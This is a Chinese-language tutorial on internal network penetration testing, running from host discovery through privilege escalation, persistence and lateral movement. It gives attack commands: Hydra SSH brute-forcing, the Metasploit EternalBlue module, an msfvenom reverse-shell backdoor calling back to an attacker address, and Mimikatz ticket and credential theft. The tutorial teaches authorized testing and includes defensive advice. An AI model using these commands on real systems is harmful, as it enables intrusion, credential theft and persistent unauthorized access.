内网渗透基础（一）：从信息收集到权限提升的实战指南

一、内网渗透的核心目标与基础概念

内网渗透（Internal Network Penetration Testing）是针对企业或组织内部网络的安全测试，其核心目标是识别内部系统、服务、权限管理中的安全漏洞，验证攻击者能否通过横向移动（Lateral Movement）或纵向提权（Privilege Escalation）获取敏感数据或控制权。与外网渗透不同，内网渗透的攻击面更贴近业务核心，涉及更多高权限操作（如域控管理、数据库访问），因此对测试者的技术深度和风险控制能力要求更高。

内网渗透的基础流程通常分为五个阶段：信息收集、漏洞扫描、漏洞利用、权限维持、横向移动。每个阶段需严格遵循“最小影响原则”，避免对业务系统造成不可逆的破坏。

二、信息收集：构建内网攻击面的关键步骤

信息收集是内网渗透的起点，其目标是绘制目标网络的拓扑结构、服务分布、用户权限等关键信息。信息收集的维度包括：

1. 网络层信息收集

• IP段与子网划分：通过ARP扫描（arp-scan）、ICMP探测（ping -b）或Nmap的-sn参数（无端口扫描）发现活跃主机。例如：

  nmap -sn 192.168.1.0/24  # 扫描192.168.1.0/24网段的存活主机

• 端口与服务识别：使用Nmap的-sV参数识别开放端口及服务版本，结合--script=vuln加载漏洞检测脚本。例如：

  nmap -sV --script=vuln 192.168.1.100  # 扫描目标主机的服务版本与已知漏洞

• 路由与网关信息：通过traceroute或mtr分析网络路径，定位核心路由设备。

2. 主机层信息收集

• 操作系统与补丁：使用smbclient（Linux）或rpcdump（Windows）获取系统版本，结合wmic命令查询补丁安装情况。例如：

  wmic qfe list  # Windows下查询已安装的补丁

• 共享资源与文件：通过net view（Windows）或smbmap（Linux）枚举共享文件夹，搜索配置文件（如web.config、ssh_host_rsa_key）。
• 进程与服务：使用pslist（Sysinternals工具）或pstree（Linux）分析运行中的进程，识别异常服务（如未授权的数据库服务）。

3. 用户与权限信息收集

• 本地用户与组：通过net user（Windows）或cat /etc/passwd（Linux）获取用户列表，结合net localgroup查询管理员组。
• 域用户与组策略：使用ldapsearch（Linux）或PowerView（Windows）枚举域用户、组策略对象（GPO）及ACL权限。例如：

  Import-Module PowerView.ps1
  Get-NetUser | Select-Object name,lastlogon  # 查询域用户及最后登录时间

三、漏洞扫描与利用：从理论到实践

信息收集完成后，需对目标系统进行漏洞扫描与利用。内网中常见的漏洞类型包括：

1. 弱口令与默认凭证

• 工具与场景：使用Hydra、Medusa或Mimikatz（内存凭证提取）攻击SSH、RDP、数据库等服务。例如，通过Hydra爆破SSH：

  hydra -l root -P /path/to/password.txt ssh://192.168.1.100

• 防御建议：强制使用复杂密码策略，禁用默认账户，定期轮换凭证。

2. 未授权访问与配置错误

• 典型案例：MongoDB未授权访问（27017端口）、Redis注入（6379端口）、Elasticsearch未授权（9200端口）。通过nmap或自定义脚本探测：

  nmap -p 27017 --script=mongodb-info 192.168.1.0/24

• 修复方案：启用认证机制，限制IP访问，关闭不必要的服务。

3. 提权漏洞利用

• 内核提权：利用Linux的Dirty Cow（CVE-2016-5195）或Windows的EternalBlue（MS17-010）获取系统权限。例如，通过Metasploit的exploit/windows/smb/ms17_010_eternalblue模块：

  use exploit/windows/smb/ms17_010_eternalblue
  set RHOSTS 192.168.1.100
  run

• 横向移动技术：通过PsExec、WMI或WinRM远程执行命令，或利用Pass the Hash（PtH）攻击获取其他主机的权限。

四、权限维持与横向移动：隐蔽与效率的平衡

权限维持的目的是在目标系统中建立持久化访问，而横向移动则通过已控制的主机扩展攻击范围。常见技术包括：

1. 权限维持

• 后门程序：植入Netcat监听或PowerShell Empire代理。例如，通过msfvenom生成后门：

  msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.5 LPORT=4444 -f exe > backdoor.exe

• 计划任务：利用schtasks创建定时任务，或修改HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run注册表项。

2. 横向移动

• 域信任利用：通过BloodHound分析域内权限关系，识别最短攻击路径。
• 票据传递攻击：使用Mimikatz的sekurlsa::tickets导出Kerberos票据，再通过kerberos::ptt注入到其他会话。

五、防御与合规：内网渗透的边界

内网渗透测试需严格遵循法律与合规要求，包括：

• 授权范围：明确测试目标、时间、方法，避免越权操作。
• 数据保护：对扫描结果、漏洞证据进行加密存储，禁止泄露敏感信息。
• 漏洞修复：测试完成后提供详细的修复建议，协助企业完善安全策略。

六、总结与展望

内网渗透是安全研究中的高阶技能，其成功依赖于对网络协议、系统漏洞、权限管理的深度理解。本文从信息收集、漏洞利用到横向移动，系统梳理了内网渗透的基础流程与技术要点。未来，随着零信任架构（Zero Trust）的普及，内网渗透的攻击面将进一步收缩，但基于社会工程学（如钓鱼攻击）和供应链漏洞的攻击仍会持续。安全研究人员需持续关注新技术动态，提升实战能力。